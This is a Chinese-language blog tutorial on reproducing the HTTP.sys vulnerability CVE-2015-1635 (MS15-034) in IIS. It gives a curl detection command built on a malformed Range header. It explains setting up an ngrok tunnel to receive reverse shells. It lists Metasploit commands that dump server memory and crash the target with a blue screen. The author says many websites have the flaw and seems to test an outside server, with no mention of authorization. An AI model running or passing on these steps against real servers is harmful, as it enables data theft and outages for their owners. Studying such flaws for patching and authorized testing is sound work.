CYH博客CYH博客

天行健,
君子以自强不息。

CVE-2015-1635复现 HTTP.SYS漏洞

最近,碰到好多网站都存在http.sys远程代码执行漏洞,就写一篇关于它的文章吧。

漏洞编号:CVE-2015-1635(MS15-034 )

危害:HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System账户上下文中执行任意代码,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。

此漏洞可远程读取iis服务器内存数据,对目前主流服务器造成一定影响。

首先,如何验证一个网站存在此漏洞呢?

最简单的方法就是用系统自带的curl来检测。

我们打开cmd,输入curl -h


CVE-2015-1635复现  HTTP.SYS漏洞(图1)


好,如图所示,说明系统自带了此命令行,可以利用它来检测目标地址。

贴上检测的命令:

curl -v url -H “Host: irrelevant” -H “Range: bytes=0-18446744073709551615”

发送请求后,从返回包判断,是否存在此漏洞

返回包里面状态码是416,则存在漏洞存在。否则不存在。


CVE-2015-1635复现  HTTP.SYS漏洞(图2)


Ok,咱们看返回的是416,既然存在那我们就去msf验证攻击一下。


kali内网映射+msf利用漏洞

注意:此次实验可以不用做内网映射直接进行攻击,我只是借着这个机会说一下内网映射。。。

好,大家都知道,虚拟机处于内网当中,那我们利用msf去攻击对方服务器就应该先把内网映射出来(接受反弹shell的时候),把kali的ip映射到外网中,才可以去攻打外网的ip。

这里我介绍一款工具。

Ngrok Linux端口转发工具:https://www.ngrok.cc

先去网站注册一个用户,然后申请免费的隧道。

选择TCP协议,自定义远程端口,本地IP地址就是kali的IP地址,端口自定义,但不要冲突。

申请好后,记住你的隧道id,用于连接。

把这款工具下载到kali,然后进到该目录,输入如下命令,即可。

启动程序:./sunny clientid 隧道id


CVE-2015-1635复现  HTTP.SYS漏洞(图3)


如下图所示,则说明端口映射成功。


CVE-2015-1635复现  HTTP.SYS漏洞(图4)


Ok,咱们启动msf利用此漏洞攻击目标服务器。

cmd下msfconsole进入msf,输入search MS15-034 (查询此漏洞的利用模块)


CVE-2015-1635复现  HTTP.SYS漏洞(图5)


好,我们选用第二个辅助攻击模块。

Use+模块名称

Use auxiliary/scanner/http/ms15_034_http_sys_memory_dump

Set RHOST ip  //设置攻击的目标ip

Exploit  //执行漏洞攻击


CVE-2015-1635复现  HTTP.SYS漏洞(图6)


如图所示,则证明攻击成功,那么接下来就可以利用其他辅助攻击模块使其死机蓝屏。

代码如下:

use auxiliary/dos/http/ms15_034_ulonglongadd  //设置辅助攻击模块

set rhosts ip  //设置目标机ip

set threads 10  //设置线程数

Exploit  //攻击


后面我就不做演示了。

未经允许不得转载:CYH博客 » CVE-2015-1635复现 HTTP.SYS漏洞
分享到: 更多 (0)

CYH博客 带给你想要内容

联系我们